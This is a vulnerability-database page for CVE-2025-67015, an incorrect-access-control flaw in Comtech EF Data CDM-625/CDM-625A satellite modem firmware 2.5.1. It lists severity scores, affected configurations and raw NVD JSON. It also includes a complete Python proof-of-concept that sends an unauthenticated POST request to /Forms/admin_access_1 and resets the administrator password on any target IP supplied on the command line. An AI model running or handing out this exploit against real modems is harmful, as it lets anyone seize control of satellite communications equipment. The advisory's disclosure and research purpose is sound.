Security Vulnerability Report
中文
CVE-2025-67015 CVSS 7.5 HIGH

CVE-2025-67015

Published: 2025-12-26 16:15:45
Last Modified: 2026-01-02 14:57:21

Description

Incorrect access control in Comtech EF Data CDM-625 / CDM-625A Advanced Satellite Modem with firmware v2.5.1 allows attackers to change the Administrator password and escalate privileges via sending a crafted POST request to /Forms/admin_access_1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:comtech:cdm-625_firmware:2.5.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:comtech:cdm-625:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:comtech:cdm-625a_firmware:2.5.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:comtech:cdm-625a:-:*:*:*:*:*:*:* - NOT VULNERABLE
Comtech EF Data CDM-625 Advanced Satellite Modem firmware v2.5.1
Comtech EF Data CDM-625A Advanced Satellite Modem firmware v2.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67015 PoC # Comtech EF Data CDM-625 / CDM-625A Password Change Vulnerability # Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-67015 def exploit(target_ip, new_password): """ Exploit for CVE-2025-67015 Unauthenticated admin password change on Comtech EF Data CDM-625 """ url = f"http://{target_ip}/Forms/admin_access_1" # Crafted POST request to change admin password headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Payload for password change - requires specific parameter names data = { 'password': new_password, 'conf_password': new_password, 'change': '1' } try: print(f"[*] Target: {target_ip}") print(f"[*] Sending password change request...") response = requests.post(url, headers=headers, data=data, timeout=10) if response.status_code == 200: print(f"[+] Password change request sent successfully") print(f"[+] New admin password: {new_password}") print(f"[*] Try logging in with new credentials") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: python {sys.argv[0]} <target_ip> <new_password>") sys.exit(1) target = sys.argv[1] password = sys.argv[2] exploit(target, password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67015", "sourceIdentifier": "[email protected]", "published": "2025-12-26T16:15:44.577", "lastModified": "2026-01-02T14:57:20.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in Comtech EF Data CDM-625 / CDM-625A Advanced Satellite Modem with firmware v2.5.1 allows attackers to change the Administrator password and escalate privileges via sending a crafted POST request to /Forms/admin_access_1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:comtech:cdm-625_firmware:2.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "C474E3E4-69C2-49DB-9B83-304EB81C336B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:comtech:cdm-625:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C017F24-ADE4-4A96-B276-1171831E93E9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:comtech:cdm-625a_firmware:2.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D1DF1C21-42C8-4D40-BCE6-5F8C301B3533"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:comtech:cdm-625a:-:*:*:*:*:*:*:*", "matchCriteriaId": "D051C20D-21CE-48E7-A9BF-19A4B386B2CA"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67015%20_%20Comtech%20EF%20Data%20CDM-625%20_%20CDM-625A%20Advanced%20_%20Broken%20Access%20Control", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.comtechefdata.com/", "source": "[email protected]", "tags": ["Product"]}]}}